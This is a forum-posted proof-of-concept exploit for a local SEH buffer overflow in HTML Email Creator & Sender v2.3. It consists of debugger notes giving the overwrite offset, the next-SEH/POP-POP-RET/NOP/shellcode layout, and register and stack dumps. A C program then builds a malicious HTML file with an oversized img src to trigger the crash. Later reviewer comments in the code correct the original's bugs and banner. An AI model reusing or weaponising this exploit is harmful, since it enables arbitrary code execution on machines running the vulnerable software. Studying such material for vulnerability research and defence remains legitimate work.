fl0 fl0w

0day HTML Email Creator & Sender v2.3 Local Buffer Overflow(Seh) Poc


Salut bro's ,got 0F**gday


/*0day HTML Email Creator & Sender v2.3 Local Buffer Overflow(Seh) Poc
********************************************************************
Debugging info
SEH handler is overwritten; the offset is 60 bytes into our buffer,
so you have to build your buffer as follows:
[POINTER TO NEXT SEH]-------[SEH HANDLER]----[NOP]------[SHELLCODE]
| | | |
JMP 4 bytes POP POP RET 50*0x90 calc.exe
*********************************************************************
*/

/*
Code execution is possible.
CPU Registers
EAX 00000000
ECX 00000208
EDX 00000000
EBX 00000029
ESP 0012E224
EBP 7C8101B1 kernel32.lstrcpynA
ESI 90909090 <------------------CONTROLLED
EDI 00001209
EIP 0042E1C7 HtmlEmai.0042E1C7

ESP points to 0012E224
Stack looks like
0012E224 90909090
0012E228 00000029 )...
0012E22C 00415D56 V]A. RETURN to HtmlEmai.00415D56 from HtmlEmai.0042E1BF
0012E230 00000208 ..
0012E234 003F9758 X—?.
0012E238 003FBD19 ½?.
0012E23C 00000000 ....
0012E240 00000029 )...
0012E244 90909090
0012E248 90909090
0012E24C 90909090
0012E250 90909090
0012E254 90909090
0012E258 90909090
0012E25C 90909090
0012E260 90909090
0012E264 90909090
0012E268 90909090
0012E26C 90909090
0012E270 90909090
0012E274 90909090
0012E278 90909090
0012E27C 909011EB ë
0012E280 41414141 AAAA
0012E284 90909090
0012E288 90909090
0012E28C 90909090
0012E290 90909090
0012E294 90909090
0012E298 90909090
0012E29C 90909090
0012E2A0 90909090
0012E2A4 90909090
0012E2A8 90909090
0012E2AC EB5903EB ëYë
0012E2B0 FFF8E805 èøÿ
0012E2B4 4949FFFF ÿÿII
0012E2B8 49494949 IIII
0012E2BC 49494949 IIII
0012E2C0 49494949 IIII
0012E2C4 51494949 IIIQ
0012E2C8 636A375A Z7jc
0012E2CC 30423058 X0B0
0012E2D0 426B4250 PBkB
0012E2D4 42417341 AsAB
0012E2D8 32414232 2BA2
0012E2DC 41304141 AA0A
0012E2E0 42385841 AX8B
0012E2E4 38755042 BPu8
*/
/*
ASM Instructions
0042E1C7 |. 8B06 MOV EAX,DWORD PTR DS:[ESI] <-------This is where it goes wrong => DS:[90909090]=??? EAX=00000000
0042E1C9 |. 8378 F4 01 CMP DWORD PTR DS:[EAX-C],1
0042E1CD |. 8D58 F4 LEA EBX,DWORD PTR DS:[EAX-C]
0042E1D0 |. 7F 05 JG SHORT HtmlEmai.0042E1D7
EAX is written with a NULL DWORD.
*/
/*
Seh Chain
0012E894 909011EB ë Pointer to next SEH record <------ overwrite with this "\xEb\x04\x90\x90"
0012E898 41414141 AAAA SE handler <-----POP POP RET
*/
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <getopt.h>
#include <windows.h>
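/* Four ASCII bytes spelling "HTML" (0x48 0x54 0x4D 0x4C); copied verbatim into the output. */
typedef struct Start {
    uint8_t sh; /* 'H' */
    uint8_t st; /* 'T' */
    uint8_t sm; /* 'M' */
    uint8_t sl; /* 'L' */
} HTML;

/* Four ASCII bytes spelling "HEAD" (0x48 0x45 0x41 0x44). */
typedef struct Middle {
    uint8_t sh; /* 'H' */
    uint8_t se; /* 'E' */
    uint8_t sa; /* 'A' */
    uint8_t sd; /* 'D' */
} HEAD;

/* Four ASCII bytes spelling "BODY" (0x42 0x4F 0x44 0x59). */
typedef struct End {
    uint8_t sb; /* 'B' */
    uint8_t so; /* 'O' */
    uint8_t sD; /* 'D' */
    uint8_t sy; /* 'Y' */
} BODY;

/* Capacity of the scratch buffer the document is assembled in (0x1A0A = 6666 bytes). */
#define BUFFERSIZE 0x1A0A
/* NOTE(review): 29A is not a valid C integer literal (missing 0x?). It is never
 * referenced, so it is harmless here, but any use would fail to compile. */
#define FILESIZE 29A
#define SRC "<img src="

/* Length of the 'A' run placed inside the img src attribute. */
enum { PAD_LEN = 4616 };

/*
 * Append n bytes from src to buf at *off, refusing to write past cap.
 * Returns 0 on success, -1 if the append would overflow the buffer
 * (in which case nothing is written and *off is unchanged).
 */
static int append_bytes(char *buf, size_t cap, size_t *off, const void *src, size_t n)
{
    if (n > cap - *off) {
        return -1;
    }
    memcpy(buf + *off, src, n);
    *off += n;
    return 0;
}

/* Append the NUL-terminated string s without its terminator. Same return convention as append_bytes. */
static int append_str(char *buf, size_t cap, size_t *off, const char *s)
{
    return append_bytes(buf, cap, off, s, strlen(s));
}

/* Append n copies of the byte c. Same return convention as append_bytes. */
static int append_fill(char *buf, size_t cap, size_t *off, int c, size_t n)
{
    if (n > cap - *off) {
        return -1;
    }
    memset(buf + *off, c, n);
    *off += n;
    return 0;
}

/*
 * Assemble the test document into buf (capacity cap) and return its length,
 * or 0 if it does not fit. The byte layout is exactly what the original
 * produced, minus the one uninitialised heap byte it used to emit:
 *   <HTML><HEAD><\HEAD><BODY><img src="AAAA...A"><\BODY><\HTML>
 * The closing tags use a backslash, not a slash -- kept as authored.
 */
static size_t build_document(char *buf, size_t cap)
{
    const HTML html = { .sh = 0x48, .st = 0x54, .sm = 0x4D, .sl = 0x4C }; /* "HTML" */
    const HEAD head = { .sh = 0x48, .se = 0x45, .sa = 0x41, .sd = 0x44 }; /* "HEAD" */
    const BODY body = { .sb = 0x42, .so = 0x4F, .sD = 0x44, .sy = 0x59 }; /* "BODY" */
    size_t off = 0;
    int rc = 0;

    /* sizeof the object (4 bytes), not sizeof a pointer as the original did --
     * on a 64-bit build that read 4 bytes past each heap object. */
    rc |= append_str(buf, cap, &off, "<");
    rc |= append_bytes(buf, cap, &off, &html, sizeof html);
    rc |= append_str(buf, cap, &off, "><");
    rc |= append_bytes(buf, cap, &off, &head, sizeof head);
    rc |= append_str(buf, cap, &off, "><\\");
    rc |= append_bytes(buf, cap, &off, &head, sizeof head);
    rc |= append_str(buf, cap, &off, "><");
    rc |= append_bytes(buf, cap, &off, &body, sizeof body);
    rc |= append_str(buf, cap, &off, ">" SRC "\"");
    rc |= append_fill(buf, cap, &off, 'A', PAD_LEN);
    rc |= append_str(buf, cap, &off, "\"><\\");
    rc |= append_bytes(buf, cap, &off, &body, sizeof body);
    rc |= append_str(buf, cap, &off, "><\\");
    rc |= append_bytes(buf, cap, &off, &html, sizeof html);
    rc |= append_str(buf, cap, &off, ">");

    return rc == 0 ? off : 0;
}

/*
 * Write the test document, followed by a single NUL byte as the original did,
 * to the path fname. The file is opened in binary mode so the trailing NUL
 * and the payload bytes are written untouched on Windows.
 *
 * fname: output path; must not be NULL.
 * Exits the process with status -1 (the original's convention) when fname is
 * NULL, when memory cannot be allocated, or when the file cannot be created,
 * written or closed. On success prints "File Done!".
 */
void Fbuild(char *fname)
{
    if (fname == NULL) {
        exit(-1);
    }

    char *buf = malloc(BUFFERSIZE);
    if (buf == NULL) {
        exit(-1);
    }

    size_t len = build_document(buf, BUFFERSIZE);
    if (len == 0) {
        free(buf);
        exit(-1);
    }

    FILE *f = fopen(fname, "wb");
    if (f == NULL) {
        free(buf);
        exit(-1);
    }

    int ok = fwrite(buf, 1, len, f) == len && fputc('\0', f) != EOF;
    free(buf);
    /* fclose flushes; for a write stream its result is part of "did the write succeed". */
    if (fclose(f) != 0 || !ok) {
        exit(-1);
    }

    printf("File Done!\n");
}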
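/*
 * Entry point: print the banner, require exactly one argument (the output
 * filename) and build the test file with Fbuild.
 *
 * argc/argv: standard; argv[1] is the output path.
 * Returns 0 on success; exits with status -1 (the original's convention)
 * when no filename is given. Fbuild exits on its own failures.
 */
int main(int argc, char *argv[])
{
    /* Cosmetic screen clear via the shell (Windows "CLS"); kept as authored. */
    system("CLS");
    puts(":: ::");
    /* The original banner named a different product ("Embedthis Appweb");
     * this is the HTML Email Creator & Sender v2.3 PoC from the post title. */
    puts("HTML Email Creator & Sender v2.3 Local Buffer Overflow PoC");
    puts("All Credits:fl0 fl0w");
    puts(":: ::");

    /* Validate argc before touching argv[1]; argv[0] may be NULL when argc == 0. */
    if (argc < 2) {
        printf("Usage is %s filename.html\n", argc > 0 ? argv[0] : "program");
        exit(-1);
    }

    Fbuild(argv[1]);
    return 0;
}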
